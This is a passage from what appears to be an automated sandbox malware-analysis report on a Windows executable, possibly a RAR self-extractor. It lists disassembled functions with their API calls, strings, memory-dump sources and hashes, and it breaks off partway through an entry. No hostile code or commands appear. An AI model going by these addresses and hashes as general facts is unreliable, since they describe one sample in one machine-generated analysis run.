                                                        • FreeLibrary.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A93F
                                                        • GetProcAddress.KERNEL32(?,?,00000000,00007FF7F4D8AA43,?,?,?,00007FF7F4D887AE,?,?,?,00007FF7F4D88769), ref: 00007FF7F4D8A94B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: a53087c635860471f9d53db6ac0d0f9dab27908d44bc4eb3c5a00c2008766543
                                                        • Instruction ID: c69b589f3a86ac6de5242902effc27d821b6766e9b51fd62b4515ccba8c45992
                                                        • Opcode Fuzzy Hash: a53087c635860471f9d53db6ac0d0f9dab27908d44bc4eb3c5a00c2008766543
                                                        • Instruction Fuzzy Hash: 5F315C21A1FA4692EB15BF43E880675B394BF45BA4FDA0535DE6D4A3D1DF3CE44082A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D85054 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(?,?,?,00007FF7F4D84FC3,?,?,?,00007FF7F4D8537A), ref: 00007FF7F4D8507B
                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F4D84FC3,?,?,?,00007FF7F4D8537A), ref: 00007FF7F4D85098
                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7F4D84FC3,?,?,?,00007FF7F4D8537A), ref: 00007FF7F4D850B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule
                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                        • API String ID: 667068680-1718035505
                                                        • Opcode ID: 1444f5c98b94489216eec6f642ec7402f856da51c0bc558bc27b28571981de2b
                                                        • Instruction ID: ecb3bc7b70ec134e664bfadc9e9564ed7e0e1b08b35faa2b0cc634a43d96562a
                                                        • Opcode Fuzzy Hash: 1444f5c98b94489216eec6f642ec7402f856da51c0bc558bc27b28571981de2b
                                                        • Instruction Fuzzy Hash: 18111C20B0EB0A83FF65AF03E9D0274B2917F58790FD95435CB6D467D0EE6CA49482E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D89238 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: abort$CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 2889003569-2084237596
                                                        • Opcode ID: 3a5394c8939429c7767624c95706d80dee7fb934122ce78df2451405f585be14
                                                        • Instruction ID: 94d73f5aacae97b5fbd4fd8291ce40cfd4876afb6bdfec7b56468645fe6ace3d
                                                        • Opcode Fuzzy Hash: 3a5394c8939429c7767624c95706d80dee7fb934122ce78df2451405f585be14
                                                        • Instruction Fuzzy Hash: 5791A073A08B858AE711DF66E8802ADBBA0FB04788F50413AEF9D17795DF38D195C740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D883BC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 2395640692-629598281
                                                        • Opcode ID: 2e68525bcb123b69dd3695be73262e4bf93529d5699b69db2b9257dd34a89159
                                                        • Instruction ID: a5c7f092107c88fb579a20cab9eebbf4ed06cc69f6d2b663e439e6533a202f0e
                                                        • Opcode Fuzzy Hash: 2e68525bcb123b69dd3695be73262e4bf93529d5699b69db2b9257dd34a89159
                                                        • Instruction Fuzzy Hash: 7151A632A0960287DB54EF16E484A39B7A5FB44B98F908571EF2E477C8DF38E841C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D7B778 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Rect
                                                        • String ID: RarHtmlClassName
                                                        • API String ID: 2396740005-1658105358
                                                        • Opcode ID: 0f7adb0d42835859a445fc98434de89ffe80b21d0821b8be92ccf7b9d4423bc4
                                                        • Instruction ID: 87f2e2d4e003f6e136bb4fa7b096c9acc66acbe0c748273cb46d66fb2b3f63f5
                                                        • Opcode Fuzzy Hash: 0f7adb0d42835859a445fc98434de89ffe80b21d0821b8be92ccf7b9d4423bc4
                                                        • Instruction Fuzzy Hash: CC517236A197828BEB24AF27E49437AF3A0FB85784F840135DB9A42795DF3CE0458790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D83954 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                        • API String ID: 0-56093855
                                                        • Opcode ID: 7c8508dbb91623a7f3c2788d42bb5db1e901b31236c0c63f0cf5ebf64345d783
                                                        • Instruction ID: 71ef72faab57aa03e2d5e610a34bb88b9611b9031e1d852d5a49ad77a7c4168f
                                                        • Opcode Fuzzy Hash: 7c8508dbb91623a7f3c2788d42bb5db1e901b31236c0c63f0cf5ebf64345d783
                                                        • Instruction Fuzzy Hash: 7C21D861919A4782EB24AF1BF8C8274F7A0BB45B84F984436CB6D473E4DE3DE15583E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8F450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 41ead686425019c1775ba5e3bb7265ff4caf85c1dac70b8825e828e77bbff3ee
                                                        • Instruction ID: 86014fe641d2e0b9f39c893afdc975fbe8ca7dc5645ee9cf5833d9cddd17250b
                                                        • Opcode Fuzzy Hash: 41ead686425019c1775ba5e3bb7265ff4caf85c1dac70b8825e828e77bbff3ee
                                                        • Instruction Fuzzy Hash: 63F03122A1974682EF44AF16E8C4379B361BFC8B90F85103ADB5F866A4DE2CD444C650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D97A94 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: c548ac832c78b92ec1d923a8916f7dc2217aa72c2b6758b80a72ecf6dff91f0c
                                                        • Instruction ID: 8a4b494d68329a4ff25be2de5c2e9f869c9aede5ff821588a7c911f6fbfcb903
                                                        • Opcode Fuzzy Hash: c548ac832c78b92ec1d923a8916f7dc2217aa72c2b6758b80a72ecf6dff91f0c
                                                        • Instruction Fuzzy Hash: FB818B22B1861686F720AF67DCC06BDB6A4BB44B98F844135DB2E976D5DF38E441C3A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D65DB8 Relevance: 7.7, APIs: 5, Instructions: 163filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 2398171386-0
                                                        • Opcode ID: acb60da309b2253dc5e9679f966fb61d554592a31164629a9f133004a7ff1bc3
                                                        • Instruction ID: 238ed82ecaeb1a63c68d0a6c577fb5d577de2e3d0ecb03030ea113cf046032fb
                                                        • Opcode Fuzzy Hash: acb60da309b2253dc5e9679f966fb61d554592a31164629a9f133004a7ff1bc3
                                                        • Instruction Fuzzy Hash: 8351D432B18B06AAFB50EF66E8903BDB361AB44798F804635DF3D466D5DF3890958390
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D97408 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                        • String ID:
                                                        • API String ID: 3659116390-0
                                                        • Opcode ID: 1cd0471f1fa0ba39e6c89e085235cb16163e43b2f139bc396a7cde33f0681fd1
                                                        • Instruction ID: fa11ac0f3c6d421d33133c8d70f3ae7282aea603d7839c0ab9bc241d55131137
                                                        • Opcode Fuzzy Hash: 1cd0471f1fa0ba39e6c89e085235cb16163e43b2f139bc396a7cde33f0681fd1
                                                        • Instruction Fuzzy Hash: 4151AF32A18A51C6E790DF66D8843ACBBB0FB44B98F448135DF6E87699DF38D141C760
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D92864 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID:
                                                        • API String ID: 190572456-0
                                                        • Opcode ID: 9cab2cbaf794975dd84f68dd969880afa2df4031812d8fe62cc01396f3b1aa86
                                                        • Instruction ID: 468e2597236d29ff2a2607280070c31a8456f279e00925c7f67df6bfd1007872
                                                        • Opcode Fuzzy Hash: 9cab2cbaf794975dd84f68dd969880afa2df4031812d8fe62cc01396f3b1aa86
                                                        • Instruction Fuzzy Hash: 9741C262B0A64593FF15BF43EC845B5B291BB15BE0F894939DE6D8B7C4DE3CE04082A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D98BA8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                        • Instruction ID: cea57cd310e6ac6b471ca9477cf65fbbd845b3c5560f9f5119aabc406c113f1a
                                                        • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                        • Instruction Fuzzy Hash: 43116062E3C60743FB583D36ECC13B9B1416F547A5F884634F77EC66D68E2CA44942A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D838E8 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                        • String ID:
                                                        • API String ID: 3621893840-0
                                                        • Opcode ID: 8b097f18887cb1e3026db83f2a8d48409f38768177490a167cdc872345ad7a60
                                                        • Instruction ID: 563afa423d2069a14815b56a5888b2e29a0ce976a5fc22ad4758fc914858d5df
                                                        • Opcode Fuzzy Hash: 8b097f18887cb1e3026db83f2a8d48409f38768177490a167cdc872345ad7a60
                                                        • Instruction Fuzzy Hash: 67F04F62B2854683F760AF62E895BBAB251FFA4B05FC45030D75E418D49E2CD449C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D897AC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: __except_validate_context_recordabort
                                                        • String ID: csm$csm
                                                        • API String ID: 746414643-3733052814
                                                        • Opcode ID: be506e55bd76a4fc1cc33cd602a9f02af468dc5fce4ddee28aa73968aa2bf590
                                                        • Instruction ID: 7ef5c6756a7d1f7b8c163e7375bbf7041c8cf96bb7aeabd3e10ca0f77b9a9740
                                                        • Opcode Fuzzy Hash: be506e55bd76a4fc1cc33cd602a9f02af468dc5fce4ddee28aa73968aa2bf590
                                                        • Instruction Fuzzy Hash: 9371B1729086828BDB61AF26D4C077DBBA0FB01B8AF848176DB9D57AC5CB2CD451C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8B50C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: $*
                                                        • API String ID: 3215553584-3982473090
                                                        • Opcode ID: 657f2f9f8f19e07b651cb89ce54e29715672433403af4f6c8af21786d19ec375
                                                        • Instruction ID: 2480815c11e95ec307d3aab52a89db8a08b388dd471feecd45acb107ae483ca2
                                                        • Opcode Fuzzy Hash: 657f2f9f8f19e07b651cb89ce54e29715672433403af4f6c8af21786d19ec375
                                                        • Instruction Fuzzy Hash: 9551A672D0E6428BE765AE36C0C637CBBA0FB05B18F951135E76A492D5CF28D481CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D89BF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
